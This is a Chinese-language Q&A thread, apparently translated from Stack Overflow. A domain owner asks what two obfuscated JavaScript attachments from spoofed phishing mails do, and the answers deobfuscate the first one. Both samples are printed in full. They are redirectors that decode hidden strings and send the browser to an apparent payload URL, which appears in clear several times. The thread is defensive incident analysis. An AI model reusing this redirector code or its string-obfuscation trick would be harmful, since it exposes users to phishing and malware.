我刚刚发现垃圾邮件发送者正在从我们的域名发送电子邮件,假装是我们,说:
尊敬的客户,
此电子邮件由ourwebsite.com发送 通知你我们有时间 阻止访问您的帐户。
我们有理由相信你的 帐户可能已被访问过 其他人。请运行附件 并按照说明进行操作。
(C)ourwebsite.com(我改变了)
附件是一个HTML文件,其中包含以下javascript:
<!-- Quoted attachment, sample 1. Three string literals have filler characters stripped by .replace(): they become a URL, "location" and "href", and the script then assigns that URL to document["location"]["href"]. The remaining statements (Date objects, empty functions, unused variables and properties) do not feed into that assignment. -->
<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>
另一封电子邮件:
<!-- Quoted attachment, sample 2. Same technique as sample 1 with different filler characters: `h` decodes to hxxp://lendermedia[.]com/images/z.htm (defanged here), `t` is document["location"], and the nested function x(b) sets b["href"] = h when called as x(t). All other statements are unused filler. -->
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
有谁能告诉我它的作用吗?这样我们就能判断我们这边是否存在漏洞,以及是否需要把这个漏洞告知客户……
谢谢
答案 0 :(得分:5)
该脚本实际执行的是:
// Net effect of the first attachment once the filler is removed: a single
// assignment that navigates the browser window that opened the HTML file.
document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)
它还包含大量无用的行来隐藏脚本的真正用途。
下面是展开后的代码。
// Unpacked copy of the first attachment script, one statement per line.
// Only the lines marked PAYLOAD contribute to the result; every other
// variable or property written here is never read again in the script.
function mD() {};
this.aB = 43719;
mD.prototype = {
i: function () {
var w = new Date();
this.j = '';
var x = function () {};
// PAYLOAD: the regex deletes the filler characters g, J, G, ',' and '<',
// which leaves the destination URL in `a`.
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d = new Date();
y = "";
aL = "";
// PAYLOAD: alias for `document`, used two statements below.
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
// PAYLOAD: with 5, r, v, L and O removed the key reads "location",
// so iD is document.location.
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
this.v = "v";
var q = 27427;
var m = new Date();
// PAYLOAD: with H, t and q removed the key reads "href"; assigning to it
// navigates the page to the URL held in `a`.
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
// The constructor exists only so the method holding the payload can be called.
var b = new mD();
yY = "";
b.i();
this.xT = '';
清理混淆并添加有意义的名称,它变为
// Same script with the three obfuscated strings replaced by their decoded
// values and mD / i renamed to TempClass / doIt. The filler statements are
// still present; none of them is read after being written.
function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
doIt: function () {
var w = new Date();
this.j = '';
var x = function () {};
// Decoded destination of the redirect.
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
// iD is document.location.
var iD = f['location'];
this.v = "v";
var q = 27427;
var m = new Date();
// Equivalent to document.location.href = a; this is the only statement
// in the method with an effect outside the script.
iD['href'] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';
删除所有无用的行,它变为
// Minimal equivalent of the attachment: construct an object and call the one
// method that redirects the browser. The script references no host other than
// the URL below, so it says nothing about how the mail was sent; whether the
// message really left the spoofed domain has to be judged from the mail
// headers (for example the SPF/DKIM results), not from this code.
function TempClass() {};
TempClass.prototype = {
doIt: function () {
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var f = document;
var iD = f['location'];
// document.location.href = a
iD['href'] = a;
}
};
var b = new TempClass();
b.doIt();
答案 1 :(得分:3)
他们可算不上什么天才:
hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
h t t p : / / m v b l a w . c o m / z . h t m
f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
l o c a t i o n
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
h r e f
甚至不需要真的运行正则表达式就能看出来 :)
我猜测他们入侵了 mvblaw,并把有效载荷页面偷偷放在了那里。有虚拟机的人愿意看看它做了什么吗?
答案 2 :(得分:3)
脚本有很多无用的东西只是为了制造混乱,脚本的基本部分是:
// The attachment script with the filler statements removed; the three
// obfuscated string literals are left exactly as they appear in the sample.
function mD() {};
mD.prototype = {
i: function () {
// read between every two letters: every second character is filler, and the
// regex on the next line deletes those filler characters to leave the URL.
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
.replace(/[gJG,\<]/g, '');
var f = document;
// Key decodes to "location" once 5, r, v, L and O are removed.
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
// Key decodes to "href" once H, t and q are removed; the assignment
// navigates the page to the URL in `a`.
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
}
};
var b = new mD();
b.i();
如果我们清理更多:
// Same method with each .replace() call substituted by the string it produces.
function mD() {};
mD.prototype = {
i: function () {
var a = 'http://mvblaw.com/z.htm';
var f = document;
// iD is document.location; setting its href navigates the page.
var iD = f['location'];
iD['href'] = a;
}
};
var b = new mD();
b.i();
还有更多:
// Fully reduced form: the temporaries are folded into one property assignment.
// The constructor and prototype wrapper add nothing beyond a place to put it.
function mD() {};
mD.prototype = {
i: function () {
// The only effect of the script: redirect the browser that opened the file.
document.location.href = 'http://mvblaw.com/z.htm';
}
};
var b = new mD();
b.i();
答案 3 :(得分:0)
基本上,它似乎是把 (document['location'])['href'](也就是通常写作的 document.location.href)设置为 http://mvblaw.com/z.htm。
这种混淆非常简单,只是把噪声字符替换为空字符串(即删除它们):
// The character class lists the filler characters (g, J, G, ',' and '<');
// replacing them with '' leaves the real string.
var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
// a = http://mvblaw.com/z.htm
var f=document;
// Same trick for the property name: the key decodes to "location".
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
// iD = document.location
// And again for "href".
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
// document.location.href = a (the URL above).